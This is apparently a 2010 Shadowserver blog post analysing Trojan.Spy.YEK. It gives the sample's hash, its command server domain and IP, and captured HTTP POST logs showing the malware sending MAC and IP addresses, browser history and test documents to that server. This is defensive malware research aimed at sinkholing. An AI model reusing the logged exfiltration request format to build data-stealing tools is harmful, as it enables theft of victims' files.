« August 2010 · February 2011 · July 2017 »

October 2010
MonTueWedThuFriSatSun
    010203
04050607080910
11121314151617
18192021222324
25262728293031
November 2010
MonTueWedThuFriSatSun
01020304050607
08091011121314
15161718192021
22232425262728
2930     
December 2010
MonTueWedThuFriSatSun
  0102030405
06070809101112
13141516171819
20212223242526
2728293031  

Calendar:

  • 30.12.2010: New Fast Flux Botnet for the Holidays: Could it be Storm Worm 3.0/Waledac 2.0?\\
  • 05.12.2010:
  • 15.11.2010: See below.
  • No entries for October 2010.
Newest first Oldest first

Monday, 15 November 2010

Trojan.Spy.YEK - File Stealer

I came across a couple of blog posts (listed below) about "Trojan.Spy.YEK, the Corporate Spying Tool"

The blogs detail a spying trojan that scans your computer for key Operating system information, archives(ZIP), document files including PDFs, emails and email address books.

The Shadowserver malware repository had the binary with MD5 hash e8f62bbf674ad74f3a25dbe0e7a0a473, so I wanted to give it a quick look to see exactly what it was doing and where it was going.

Initial Network Traffic

Upon launch, the binary did a DNS lookup to fullmooninfo.com which was on 122.155.7.194

DNS queries

After connecting to the server, the following HTTP POST was seen:

  • POST /data/makarekiki/save.php HTTP/1.1
  • Accept: */*
  • Host: fullmooninfo.com
  • Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
  • User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
  • Connection: Keep-Alive
  • Cache-Control: no-cache
  • Content-Length: 1360-'

Each POST to /data/makarekiki/save.php was associated with files and other information being sent to the server. The header of the POST always contained the MAC address and IP address of the infected machine. For example:

  • POST /data/makarekiki/save.php HTTP/1.1
  • Accept: */*
  • Host: fullmooninfo.com
  • Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
  • User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
  • Connection: Keep-Alive
  • Cache-Control: no-cache
  • Content-Length: 1360
  • -----------------------------7d71f43a50782
  • Content-Disposition: form-data; name="MAC"
  • 00-0C-29-D7-FA-34
  • -----------------------------7d71f43a50782
  • Content-Disposition: form-data; name="IP"
  • 192.168.77.222
  • -----------------------------7d71f43a50782-'

Following this header, the actual data was sent. for example, in this case, the urllog.txt associated with the URL history of Internet Explorer was sent as follows:

  • Content-Disposition: form-data; name="expo2010"; filename="urllog.dat"
  • Content-Type: application/octet-stream
  • 1|http: //www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
  • 1|http: //update.microsoft.com/favicon.ico
  • 1|res: //C:\WINDOWS\system32\shdoclc.dll/dnserror.htm
  • 1|http: //www.msn.com
  • 1|http: //update.microsoft.com/windowsupdate/v6/default.aspx
  • 1|http: //update.microsoft.com/windowsupdate/v6/splash.aspx?ln=en-us&page=8
  • 1|http: //www.microsoft.com/favicon.ico
  • 1|http: //www.windowsmedia.com/MediaGuide/Home?WMPFriendly=true&locale=409&version=9.0.0.3250
  • 1|http: //update.microsoft.com/windowsupdate/v6/resultslist.aspx?ln=en-us&id=6
  • 1|http: //windowsmedia.com/redir/mediaguide.asp?WMPFriendly=true&locale=409&version=9.0.0.3250
  • 1|http: //www.microsoft.com/windows/internet-explorer/welcome.aspx
  • 1|http: //www.microsoft.com/favicon.ico
  • 1|about:Home
  • 1|http: //go.microsoft.com/fwlink/?LinkID=121792
  • 1|http: //home.microsoft.com
  • 1|http: //windowsupdate.microsoft.com
  • 1|http: //update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us-'

I then created a few example files called 'secret_document.doc' and 'secret_document.pdf' and placed it in the 'My Documents' folder. I soon saw the following traffic:

  • POST /data/makarekiki/save.php HTTP/1.1
  • Accept: */*
  • Host: fullmooninfo.com
  • Content-Type: multipart/form-data; boundary=---------------------------7d71f43a50782
  • User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
  • Connection: Keep-Alive
  • Cache-Control: no-cache
  • Content-Length: 9645
  • -----------------------------7d71f43a50782
  • Content-Disposition: form-data; name="MAC"
  • 00-0C-29-D7-FA-34
  • -----------------------------7d71f43a50782
  • Content-Disposition: form-data; name="IP"
  • 192.168.77.222
  • -----------------------------7d71f43a50782
  • Content-Disposition: form-data; name="expo2010"; filename="secret_document.doc"
  • Content-Type: application/octet-stream

Followed by the contents of the document. I then saw the same for filename="secret_document.pdf"

I also noticed other POST commands associated with dropping a new binary called 'rebirth.exe' and another that requested the file="total_info.dat" which provides detailed information on the operating system configuration.

fullmooninfo.com Hosting Provider

The following is the whois information for 'fullmooninfo.com'.

fullmooninfo.com WhoIs

Currently this domain is being hosted on IP Address: 122.155.7.194. This appears to be a shared host as Passive DNS queries show over 50 domains being hosted here.

This IP belongs to ASN 9931 - CAT-AP - The Communications Authority of Thailand.

Reverse DNS on that IP shows ns1-1557194.dragonhighspeed.com.

Current Status

While the server is still active, the URLs that are to receive the files and information return a '404 Not Found'

  • POST /data/makarekiki//cas2.php?a1=1008&a2=1 HTTP/1.1
  • Accept: */*
  • Host: fullmooninfo.com
  • User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SVI)
  • Content-Length: 0
  • Connection: Keep-Alive
  • Cache-Control: no-cache
  • HTTP/1.0 404 Not Found

Additionally, browsing to the main page of fullmooninfo.com yields the following error:

fullmooninfo.com

Conclusion

While in-depth analysis of the malware still needs to be done, initial examination indicates that this is something that should be followed closely. Shadowserver is in the process of attempting to sinkhole any domains associated with this trojan, so that any victim IPs can be identified and reported.

Reference

The following links provide additional information on Trojan.Spy.YEK

http://www.malwarecity.com/blog/trojanspyyek-the-corporate-spying-tool-931.html

http://www.pcworld.com/article/210499/new_trojan_threat_emerges.html

=>Posted November 15, 2010, at 10:28 PM by Andre' - Semper_Securus